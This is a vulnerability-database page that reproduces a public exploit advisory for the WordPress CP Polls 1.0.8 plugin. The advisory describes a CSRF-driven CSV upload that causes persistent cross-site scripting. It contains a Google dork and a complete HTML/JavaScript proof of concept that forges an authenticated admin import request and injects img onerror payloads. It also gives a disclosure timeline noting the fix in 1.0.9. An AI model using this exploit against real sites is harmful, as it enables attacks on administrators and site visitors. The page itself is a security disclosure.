Vulners
Lucene search
WordPress CP Polls 1.0.8 File Upload / Cross Site Scripting
🗓️ 02 Mar 2016 00:00:00Reported by Joaquin Ramirez MartinezType 
packetstorm🔗 packetstormsecurity.com👁 34 Views
`# Exploit Title: WordPress CP Polls 1.0.8 - Cross-site file upload & persistent XSS
# Date: 2016-02-22
# Google Dork: Index of /wp-content/plugins/cp-polls/
# Exploit Author: Joaquin Ramirez Martinez [ i0akiN SEC-LABORATORY ]
# Plugin URI: http://wordpress.dwbooster.com/forms/cp-polls
# Version: 1.0.8
=============
Description
=============
With **CP Polls** you can publish a poll into a page/post and optionally display statistics of the results.
You can receive email notifications every time a vote is added or opt to receive Excel reports periodically.
The Polls can have dependant questions, this means that some questions are displayed depending of the
selection made on other questions.
(copy of README.txt)
===================
Technical details
===================
CP Polls plugin for wordpress is prone to persistent XSS via cross-site file upload.
When we register an cp_poll, it is sanitized correctly but when we upload a CSV file, we can
bypass the protection and inject malicious HTML/Javascript.
There are not CSRF protection in that action so it can be exploited with a CSRF attack by sending a
malicious link to a victim (administrator) a wait for execution of the malicious request.
=========================
Proof of Concept (html)
=========================
<html>
<body>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://<wp.host>/wp-admin/admin.php?page=CP_Polls&cal=1&list=1&import=1", true);
xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------17460754011784");
xhr.setRequestHeader("Accept-Language", "es-MX,es-ES;q=0.9,es;q=0.7,es-AR;q=0.6,es-CL;q=0.4,en-US;q=0.3,en;q=0.1");
xhr.withCredentials = true;
var body = "-----------------------------17460754011784\r\n" +
"Content-Disposition: form-data; name=\"importfile\"; filename=\"csv.csv\"\r\n" +
"Content-Type: application/octet-stream\r\n" +
"\r\n" +
"2013-04-21 18:50:00, 192.168.1.12, <img src=x onerror=alert('You_are_owned!')>,
\"<img src=x onerror=alert('I am scared!')>\", \"sample subject\", \"\"\r\n" +
"-----------------------------17460754011784\r\n" +
"Content-Disposition: form-data; name=\"pbuttonimport\"\r\n" +
"\r\n" +
"Import\r\n" +
"-----------------------------17460754011784--\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
</script>
<form action="#">
<input type="button" value="Submit request" onclick="submitRequest();" />
</form>
</body>
</html>
==========
CREDITS
==========
Vulnerability discovered by:
Joaquin Ramirez Martinez [i0 security-lab]
joaquin.ramirez.mtz.lab[at]gmail[dot]com
https://www.facebook.com/I0-security-lab-524954460988147/
https://www.youtube.com/channel/UCe1Ex2Y0wD71I_cet-Wsu7Q
========
TIMELINE
========
2016-02-10 vulnerability discovered
2016-02-22 reported to vendor
2016-03-01 released cp polls v1.0.9
2016-03-01 public disclousure
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
02 Mar 2016 00:00Current
0.2Low risk
Vulners AI Score0.2